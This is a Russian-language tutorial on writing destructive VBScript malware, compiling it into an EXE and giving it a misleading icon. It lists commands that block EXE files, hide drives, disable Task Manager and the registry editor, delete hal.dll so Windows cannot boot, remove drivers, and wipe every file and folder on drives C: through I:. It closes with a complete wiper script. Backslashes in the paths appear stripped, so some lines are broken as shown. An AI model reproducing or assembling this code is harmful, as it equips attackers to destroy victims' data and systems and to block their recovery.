Короче не важно новичок ты или умелый хакер,важно то нужно это тебе или нет???
Вредоносная программа будет написана на языке visual basic script.
Затем скомпелирована в "exe" формат.
Приступим.
Для начала,нужно уметь изменять расширение файла, с этого и начнём.
Существует много способов, но мне нравится этот.
У каждого должен быть обычный архиватор,вот им мы и воспользуемся.
И так,создайте к примеру текстовый фаил под названием "Текстовый документ".
Теперь найдите этот текстовик через свой архиватор. В архиваторе,
вы должны увидеть следующее: "Текстовый документ.txt".
Окончание "txt" - имя расширения файла,вот его и нужно изменить,точно так же, словно, редактируете имя папки или файла,стираете строчку "txt" и ставите скажем "mp3".
В результате мы получаем "Текстовый документ.mp3" формата.
Если всё понятно, а вопросов возникнуть по этому поводу недолжно,то пойдём дальше.
Создайте текстовый документ,содержащий следующее:
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
s.run"rundll32 user32, SwapMouseButton"

Затем, сохранив полученные данные, вам нужно изменить расширение файла, и вместо "txt" прописать "vbs".

Аббревиатура "vbs", происходит от названия языка программирования - "visual basic script".

Вот у нас и готова первая, простая, вредоносная программка, меняющая местами кнопки мыши.

Теперь нужно её скомпелировать (изменить) в "exe" формат с помощью программы: "Vbs2Exe",
и установить любой значок с помощью грабера иконок: "IconToy".

А теперь информация для тех, кто не намерен ограничивать свои возможности банальным обменом кнопок мыши.
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
Три, верхние строчки - должны присутствовать всегда. Далее,
следует кодировка, а ниже, в скобках - пояснение.

Так же возможно сочетать, те или иные вредоносные команды.
s.regwrite"HKCRexefileshellopencommand","rundll32.exe"
(Запрет на открытие "EXE" файлов)
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives","67108863","REG_DWORD"
s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoViewOnDrive","67108863","REG_DWORD"
(запрет доступа к жёстким дискам)
fso.deletefile fso.getspecialfolder(0)+"system32hal.dll",1
(удаляется системный фаил, после чего загрузка Windows становится невозможна.

Система работает до первой перезагрузки)
fso.deletefolder fso.getspecialfolder(0)+"system32drives",1
fso.deletefolder fso.getspecialfolder(0)+"Driver Cache"
(удаление драйверов)

fso.deletefolder "АДРЕС",1
(Удаление папки. Пример: fso.deletefolder "C:Новая папка",1)

fso.deletefolder "C:*.*",1
(Удаление всех папок диска С. Адрес можно поставить любой)

fso.deletefile "АДРЕС",1
(Удаление файла. Пример: fso.deletefile "C:Новая папкаТекстовый документ.txt",1)

fso.deletefile "C:*.*",1
(Удаление всех файлов диска С. Адрес можно поставить любой)

s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisableregistrytools","1","REG_DWORD"
(Запрет редактирования реестра)

s.regwrite"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemdisabletaskmgr","1","REG_DWORD"
(Запрет диспетчера задач)

s.run"rundll32 user32, SwapMouseButton"
(Обмен кнопок мыши)

Пример:

on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
fso.deletefile "C:*.*",1
fso.deletefolder "C:*.*",1
fso.deletefile "D:*.*",1
fso.deletefolder "D:*.*",1
fso.deletefile "E:*.*",1
fso.deletefolder "E:*.*",1
fso.deletefile "F:*.*",1
fso.deletefolder "F:*.*",1
fso.deletefile "G:*.*",1
fso.deletefolder "G:*.*",1
fso.deletefile "H:*.*",1
fso.deletefolder "H:*.*",1
fso.deletefile "I:*.*",1
fso.deletefolder "I:*.*",1
fso.deletefile fso.getspecialfolder(0)+"system32hal.dll",1

Удачи !